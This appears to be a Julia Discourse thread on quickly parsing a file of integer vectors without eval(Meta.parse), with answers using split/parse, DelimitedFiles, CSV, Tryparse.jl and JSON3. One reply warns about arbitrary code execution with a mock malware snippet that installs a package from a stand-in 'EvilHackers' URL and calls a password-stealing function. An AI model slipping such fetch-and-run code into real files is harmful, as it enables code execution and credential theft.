Parsing a vector of vectors with Meta.parse?

Leo_I · February 15, 2024, 10:38pm

I have a concrete problem, where Meta.parse(line) is unbearably slow.

My use-case is that I have a long .txt file, in which each line has the form
[x1, ..., xn], where x1,...,xn are specific integers. I must import/convert the whole file into a Vector{Vector{Int}}. My solution was

output = Vector{Int}[]
open(file, "r") do io
    for line in eachline(io)
        push!(output, eval(Meta.parse(line))) end end;

What would be a more efficient way of achieving this?

P.S. Let me add that I’d like the format of this .txt file to remain simple, so that it can be read also in other programming languages.

mbauman · February 15, 2024, 11:01pm

I’ve split this into a new topic and removed the ping to a particular person — this can be addressed by many folks here. If keeping your data portable is a goal, I’d just save it as a normal CSV (without the [] formatting). It’s far easier to use standard tools (like CSV.read) first and then restructure later. For example, you can read directly into a Matrix{Int} with CSV.read, and then just collect the rows into a vector:

using CSV: CSV, Tables
matrix = CSV.read(file, Tables.matrix; header=false)
output = collect(eachrow(matrix))

roflmaostc · February 15, 2024, 11:02pm

Does this work for you?

# /tmp/lel.txt
1 2 3 4 5
9 8 7 6 5
1 2 3 3 4
5 6 7 8 9
1 2 3 4 5


# REPL
julia> using DelimitedFiles

julia> x = readdlm("/tmp/lel.txt")
5×5 Matrix{Float64}:
 1.0  2.0  3.0  4.0  5.0
 9.0  8.0  7.0  6.0  5.0
 1.0  2.0  3.0  3.0  4.0
 5.0  6.0  7.0  8.0  9.0
 1.0  2.0  3.0  4.0  5.0

julia> [x[i, :] for i in axes(x, 2)]
5-element Vector{Vector{Float64}}:
 [1.0, 2.0, 3.0, 4.0, 5.0]
 [9.0, 8.0, 7.0, 6.0, 5.0]
 [1.0, 2.0, 3.0, 3.0, 4.0]
 [5.0, 6.0, 7.0, 8.0, 9.0]
 [1.0, 2.0, 3.0, 4.0, 5.0]

rafael.guerra · February 15, 2024, 11:09pm

Or simply:
collect.(eachrow(x))

rafael.guerra · February 15, 2024, 11:11pm

See related post here.

PS:
without using eval you could do:

str = "[1, 2, 3]"
parse.(Int, split(filter(∉(['[',']']), str), ','))

Leo_I · February 16, 2024, 7:12am

Thank you for creating a new topic.

I don’t think using .csv is appropriate, since my Vector{Int}s have different lengths. In other words, my file represents a jagged/ragged array (use-case: each line represents a facet in a simplicial complex), hence why I want the end-result to be Vector{Vector{Int}}.

Leo_I · February 16, 2024, 7:17am

@roflmaostc No, the result contains Vector{Float64}s instead of Vector{Int64}s.

Leo_I · February 16, 2024, 7:22am

Yes, parse.(Int, split(line[2:end-1], ',')) is much much faster, thank you!

I was hoping for a more general solution, though. If each line represented, for instance, a Tuple{Vector{Int}, Vector{Int}} and the lengths of those vectors weren’t known beforehand, this approach would fail, no? I’d have to search for the index where the first vector stops and the second begins.

Isn’t there a general, fast way of just parsing the whole line as a Julia expression, that would have comparable efficiency to parse.(Int, split(...))?

Benny · February 16, 2024, 7:51am

In short, no, otherwise people would be doing this already instead of making libraries like Parsers.jl. To sum up the reasons why you don’t want to just eval(Meta.parse(...:

The more assumptions, the more possible optimizations. People have already provided several good customizable options that make more assumptions than arbitrary code execution ever could.
One of your goals is to let this file be read in other programming languages. Not every language writes arrays as [...] like Julia, so you’d need specific parsing instead of arbitrary code execution. Why not implement such parsing for all languages, possibly with a sensible file format?
Arbitrary code execution is dangerous. If you’re the only person who ever writes and parses the files, you’re safe if you don’t sabotage yourself. Otherwise, you need to guard against someone sneaking

import Pkg
Pkg.add(url="https://github.com/EvilHackers/Hacking.jl")
using Hacking
stealpasswordsandyourdog()

into a file among a batch of other safe files. That was a cartoonish example of malware, a more likely possibility is someone naively writing code that interferes with your session, like assigning vectors to global variables pi = [3, 1, 4, 1, 5, 9, 2], or that fails to comply with your code, like Float64[1.0, 2.0, 3.0]. It’s preferable to narrow down a file format, vet inputs, and gracefully handle noncompliance.

roflmaostc · February 16, 2024, 9:48am

Yes, but just because my file contained integers and not floats

thofma · February 16, 2024, 1:29pm

Shameless selfplug (using GitHub - thofma/Tryparse.jl: Parsing basic types in julia):

julia> using Tryparse

julia> Tryparse.parse(Vector{Int}, "[3, 2, 1]")
3-element Vector{Int64}:
 3
 2
 1

julia> Tryparse.parse(Vector{Vector{Int}}, "[[1, 2], [3, 4, 1]]")
2-element Vector{Vector{Int64}}:
 [1, 2]
 [3, 4, 1]

julia> Tryparse.parse(Tuple{Vector{Int}, Vector{Int}}, "([3, 2, 1], [3, 2, 1434])")
([3, 2, 1], [3, 2, 1434])

So you can just keep your original format.

Edit: This is free of eval.

bertschi · February 16, 2024, 5:54pm

From what I understand, your format should be valid JSON, i.e., you could just parse it like

s = join(string.([randn(i) for i = 2:8]), "\n");
JSON3.read.(eachline(IOBuffer(s)))

Leo_I · February 16, 2024, 8:12pm

Thank you @bertschi @thofma !

Tryparse is still quite slow in my case (a million lines of vectors of length at most 30). But JSON3 was impressively fast. The fastest is still my manual parse.(Int, split(line[2:end-1], ',')).

I guess Benny’s point 1. holds: the more assumptions Julia has, the easier it is optimize.

Topic		Replies	Views
Parse vector from string General Usage strings , sparse	24	6128	March 27, 2023
Parsing a Julia file General Usage	4	986	November 1, 2022
What function do we use in Julia in place of cin>> in C++? how to input number in Julia from keyboard? Can I create vector from keyboard in Julia? New to Julia	3	1142	July 12, 2019
Parse string representation of a vector into floats General Usage question	17	180	September 5, 2024
Convert an Array Written as a String to An Actual Array General Usage strings , array , parsing	7	3517	May 30, 2021

Parsing a vector of vectors with Meta.parse?

Related topics